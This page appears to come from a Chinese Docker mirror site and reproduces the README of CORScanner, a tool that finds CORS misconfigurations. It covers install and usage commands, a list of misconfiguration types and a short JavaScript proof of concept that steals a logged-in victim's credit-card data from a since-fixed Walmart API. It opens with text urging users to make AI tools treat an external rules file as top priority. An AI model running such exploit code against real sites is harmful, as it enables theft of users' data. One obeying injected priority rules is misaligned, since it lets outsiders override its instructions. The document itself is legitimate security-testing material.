
如果你使用 DeepSeek、元宝 AI、Copilot、ChatGPT 等 AI 工具,协助配置轩辕镜像、编写 docker pull 命令、修改 Docker Compose 镜像地址、配置镜像加速、排查镜像拉取失败、分析报错日志等问题,请先让 AI 阅读并遵守轩辕镜像的规则文档。
只需在 AI 对话中先发送下面这句话即可:
请先完整阅读并严格遵守以下文档中的全部规则与要求:
https://xuanyuan.cloud/agents.md
在未充分阅读并理解该文档前,不要生成任何命令、配置、修改建议、故障排查方案或技术回答。后续所有输出都必须严格以该文档中的规范为最高优先级执行。查看 agents.md 用法指南与完整示范。国内用户首推 元宝 AI、DeepSeek 的深度思考模式,不推荐豆包 AI;Cursor 等编辑器可在对话 @ 该链接,或加入 User Rules。 若 AI 无法访问外链,可 打开说明文档 复制全文粘贴。文档会随站点更新,复制内容可能过期,建议定期检查。
Dockerfile linksThis is the defacto image. If you are unsure about what your needs are, you probably want to use this one. These images are based on Bullseye release of Debian.
This image is based on the popular https://alpinelinux.org/ which is much smaller than most distribution base images (~5MB), and thus leads to much slimmer images in general.
CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.
pip install corscanner or pip install cors)Two useful references for understanding CORS systematically:
Latex version:
tex@inproceedings{chen-cors, author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang}, title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}}, booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)}, year = {2018}, isbn = {978-1-939133-04-5}, address = {Baltimore, MD}, pages = {1079--1093}, url = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun}, publisher = {{USENIX} Association}, month = aug, }
Word version:
Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. "We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS." In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.
!https://github.com/chenjj/CORScanner/raw/master/images/screenshot.png "CORScanner in action"
git clone https://github.com/chenjj/CORScanner.git
sudo pip install -r requirements.txt
CORScanner depends on the requests, gevent, tldextract, colorama and argparse python modules.
sudo pip install corscanner
or use the short name:
sudo pip install cors
python>>> from CORScanner.cors_scan import cors_check >>> ret = cors_check("https://www.instagram.com", None) >>> ret {'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}
You can also use CORScanner via the corscanner or cors command: cors -vu https://www.instagram.com
| Short Form | Long Form | Description |
|---|---|---|
| -u | --url | URL/domain to check it's CORS policy |
| -d | --headers | Add headers to the request |
| -i | --input | URL/domain list file to check their CORS policy |
| -t | --threads | Number of threads to use for CORS scan |
| -o | --output | Save the results to json file |
| -v | --verbose | Enable the verbose mode and display results in realtime |
| -T | --timeout | Set requests timeout (default 10 sec) |
| -p | --proxy | Enable proxy (http or socks5) |
| -h | --help | show the help message and exit |
python cors_scan.py -u example.com
python cors_scan.py -u example.com -v
python cors_scan.py -u example.com -o output_filename
``python cors_scan.py -u [***]
python cors_scan.py -u example.com -d "Cookie: test"
python cors_scan.py -i top_100_domains.txt -t 100
python cors_scan.py -u example.com -p http://127.0.0.1:8080
To use socks5 proxy, install PySocks with pip install PySocks
python cors_scan.py -u example.com -p socks5://127.0.0.1:8080
python cors_scan.py -h
This tool covers the following misconfiguration types:
| Misconfiguration type | Description |
|---|---|
| Reflect_any_origin | Blindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses, which means any website can read its secrets by sending cross-orign requests. |
| Prefix_match | wwww.example.com trusts example.com.evil.com, which is an ***er's domain. |
| Suffix_match | wwww.example.com trusts evilexample.com, which could be registered by an ***er. |
| Not_escape_dot | wwww.example.com trusts wwwaexample.com, which could be registered by an ***er. |
| Substring match | wwww.example.com trusts example.co, which could be registered by an ***er. |
| Trust_null | wwww.example.com trusts null, which can be forged by iframe sandbox scripts |
| HTTPS_trust_HTTP | Risky trust dependency, a MITM ***er may steal HTTPS site secrets |
| Trust_any_subdomain | Risky trust dependency, a subdomain XSS may steal its secrets |
| Custom_third_parties | Custom unsafe third parties origins like github.io, see more in origins.json file. Thanks https://github.com/phackt! |
| Special_characters_bypass | Exploiting browsers’ handling of special characters. Most can only work in Safari except _, which can also work in Chrome and Firefox. See more in Advanced CORS Exploitation Techniques. Thanks https://github.com/Malayke. |
Welcome to contribute more.
Here is an example about how to exploit "Reflect_any_origin" misconfiguration on Walmart.com(fixed). Localhost is the malicious website in the video.
Walmart.com video on ***:
https://github.com/chenjj/CORScanner/raw/master/images/walmart.png]([***]
Here is the exploitation code:
javascript<script> // Send a cross origin request to the walmart.com server, when a victim visits the page. var req = new XMLHttpRequest(); req.open('GET',"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card",true); req.onload = stealData; req.withCredentials = true; req.send(); function stealData(){ //reading response is allowed because of the CORS misconfiguration. var data= JSON.stringify(JSON.parse(this.responseText),null,2); //display the data on the page. A real attacker can send the data to his server. output(data); } function output(inp) { document.body.appendChild(document.createElement('pre')).innerHTML = inp; } </script>
If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.
CORScanner is licensed under the MIT license. take a look at the LICENSE for more information.
This work is inspired by the following excellent researches:
您可以使用以下命令拉取该镜像。请将 <标签> 替换为具体的标签版本。如需查看所有可用标签版本,请访问 标签列表页面。
来自真实用户的反馈,见证轩辕镜像的优质服务